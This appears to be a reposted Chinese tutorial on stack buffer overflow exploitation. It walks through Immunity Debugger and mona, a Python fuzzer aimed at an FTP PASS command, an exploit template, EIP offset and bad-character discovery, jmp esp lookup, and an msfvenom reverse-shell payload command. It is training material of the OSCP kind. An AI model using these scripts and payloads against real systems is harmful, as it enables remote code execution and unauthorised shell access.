缓冲区溢出流程

缓冲区溢出流程缓冲区溢出流程一、ImmunityDebugger最好以管理员的身份运行Innunitydebugger通常有两种方法可以使用ImmunityDebugger来调试应用程序:确保应用

大家好,又见面了,我是你们的朋友全栈君。

缓冲区溢出流程

一、Immunity Debugger

  • 最好以管理员的身份运行Innunity debugger

  • 通常有两种方法可以使用 Immunity Debugger 来调试应用程序:

  1. 确保应用程序正在运行,打开 Immunity Debugger,然后使用File -> Attach调试器攻击正在运行的进程。
  2. 打开 Immunity Debugger,然后使用它File -> Open来运行应用程序。
  • 在 Immunity Debugger 中附加到应用程序或打开应用程序时,应用程序将被暂停。单击“运行”按钮或按 F9。

二、mona

Mona 是一个强大的 Immunity Debugger 插件,可以更轻松地利用缓出。下载::download:mona.py <../_static/files/mona.py>

最新版本可以在这里下载:https : //github.com/corelan/mona

这里找到:https : //www.corelan.be/index.php/2011/07/14/mona-py-the-manual/

将 mona.py 文件复制到 Immunity Debugger 的 PyCommands 目录(通常位于C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands)。

在 Immunity Debugger 中,键入以下内容以设置 mona 的工作目录。

!mona config -set workingfolder c:\mona\%p

三、模糊测试

  • 可以修改以下 Python 脚本,它将发送越来越长的缓冲区字符串,最终使应用程序崩溃。
import socket, time, sys

ip = "MACHINE_IP" //目标IP
port = 21  
timeout = 5

# Create an array of increasing length buffer strings.
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        connect = s.connect((ip, port))
        s.recv(1024)
        s.send("USER username\r\n")
        s.recv(1024)

        print("Fuzzing PASS with %s bytes" % len(string))
        s.send("PASS " + string + "\r\n")
        s.recv(1024)
        s.send("QUIT\r\n")
        s.recv(1024)
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)

  • 检查 EIP 寄存器是否已被 A (\x41) 覆盖,并记下使崩溃发送的字节长度

四、控制EIP

以下python漏洞利用代码可用于缓冲区溢出漏洞利用的其余部分:

import socket

ip = "10.0.0.1"   //目标IP
port = 21

prefix = ""
offset = 0  //EIP偏移量
overflow = "A" * offset   //无意义的填充物
retn = ""     //ESP跳板
padding = ""  //nop缓冲区(至少/x90 *16)
payload = ""  //恶意代码
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

寻找EIP

  • 使用导致崩溃的缓冲区长度,生成一个唯一的缓冲区,以便我们可以确定覆盖 EIP 寄存器的模式中的偏移量,以及其他寄存器指向的模式中的偏移量。创建一个比崩溃缓冲区大 400 字节的模式,以便我们可以确定我们的 shellcode 是否可以立即适应。
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600    //应该将600修改为比缓冲区崩溃长度大400字节的数字
  • 使用 mona 的 findmsp 命令,并将距离参数设置为比缓冲区崩溃大400的数字,确定EIP偏移量
!mona findmsp -distance 600   //600应该更改
  • 或者在攻击机机器里使用下面的命令来确定EIP偏移量
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134   //后面的数字是EIP的值

五、查找坏字符

  • 使用 mona 生成字节数组,并默认排除空字节 (\x00)。请注意生成的 bytearray.bin 文件的位置

!mona bytearray -b "\x00"

  • 现在生成一串与字节数组相同的坏字符。以下 python 脚本可用于生成从 \x01 到 \xff 的坏字符字符串:
#!/usr/bin/env python
from __future__ import print_function

for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')

print()

  • 使用 mona compare 命令引用你生成的字节数组,以及 ESP 指向的地址:
!mona compare -f C:\mona\appname\bytearray.bin -a <esp地址>  
  • 使用Ctrl + F4组合键可以查看之前找到的坏字符
  • 注意:应该逐个排除坏字符,因为前一个坏字符可能会影响到后一个,导致好的字符被误判为坏字符

六、寻找跳板(ESP)

  • 使用以下指令寻找ESP,并且确保不会出现坏字符:

!mona jmp -r esp -cpb " " //引号内的是坏字符

  • 会显示多个ESP结果,都行,记下地址,写到代码中时地址要反过来写,因为进出顺序不同

七、生成有效载荷

  • 使用 msfvenom 生成反向 shell 负载,确保排除之前发现的相同错误字符:
msfvenom -p windows/shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f py -v payload

-p 载荷类型
LHOST 本机地址
LPORT
-b 坏字符
-f 编译的语言
-v 载荷的名称
  • 注意:生成的载荷是字节类型的,放入python3脚本的时候可能需要转换成字符串类型

八、预先准备 NOP

  • 如果使用了编码器(如果存在错误字符的可能性很大,请记住在有效负载之前至少添加 16 个 NOP (\x90)。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/155791.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • WiFi的2.4G、5G、6G频段「建议收藏」

    WiFi的2.4G、5G、6G频段「建议收藏」目前WiFi已经推出了6G频段,Android源码中也增加了相关的功能,这里总结一下。2.4G一共分为14个信道(1-14),从2412到2484,每个信道的有效宽度是20MHz,另外还有2MHz的强制隔离频带(类似于公路上的隔离带)。即,对于中心频率为2412MHz的1信道,其频率范围为2401~2423MHz。5G一共有60个信道(32-173),从5160到5865,在中国支持的5G信道为363840444648525456606264,后六个是DFS。6G为1-2

    2022年10月20日
    5
  • 单片机:STC89C52的最小单元「建议收藏」

    单片机:STC89C52的最小单元「建议收藏」STC89C52RC是STC公司生产的一种低功耗、高性能CMOS8位微控制器,具有8K字节系统可编程Flash存储器。STC89C52使用经典的MCS-51内核,但做了很多的改进使得芯片具有传统51单片机不具备的功能。在单芯片上,拥有灵巧的8位CPU和在系统可编程Flash,使得STC89C52为众多嵌入式控制应用系统提供高灵活、超有效的解决方案。中文名STC89C52本    质一种低耗高

    2022年8月30日
    5
  • 2016c和java哪个好就业_c语言和java哪个好就业

    2016c和java哪个好就业_c语言和java哪个好就业从 c 语言和 java 的特性上来说 java 能够跨平台有可移植性 要比 c 语言灵活 所以 java 的应用性更加广泛 就业机会也更多 学 c 语言还是 java 从两者的起源来看 java 是 c 语言的后辈 它是在 c 语言的基础上发展得来 抛弃了难懂的指针概念 和 c 完全不同的是 java 是一门面向对象的语言 因为 java 的跨平台和可移植性 许多企业对 java 的需求很大 此外 java 语言的优良特性使得 java 应用具有无比的

    2026年2月3日
    0
  • maven 环境配置详细步骤[通俗易懂]

    maven 环境配置详细步骤[通俗易懂]maven环境配置前言环境配置步骤本地仓库配置新建一个maven项目与其环境配置前言maven是一个项目自动构建工具,环境配置步骤1、首先去官网下载maven安装包:http://maven.apache.org/download.cgi2、配置maven环境变量如上图配置MAVEN_HOME和M2_HOME,其内容是maven的安装路径(不要有中文!)3、修改path添加maven相关路径在path中配置jdk的环境变量后面加上两条:%MAVEN_HOME%\bin%M2_HOME

    2022年5月14日
    60
  • WIFI 简单的连接及常用密码破解

    WIFI所需权限及配置&amp;lt;uses-permissionandroid:name=&quot;android.permission.INTERNET&quot;/&amp;gt;&amp;lt;uses-permissionandroid:name=&quot;android.permission.CHANGE_WIFI_STATE&quot;/&amp;gt;&amp;lt;u

    2022年4月13日
    63
  • [技术干货]高并发下如何保证接口的幂等性?

    [技术干货]高并发下如何保证接口的幂等性?

    2022年2月18日
    46

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号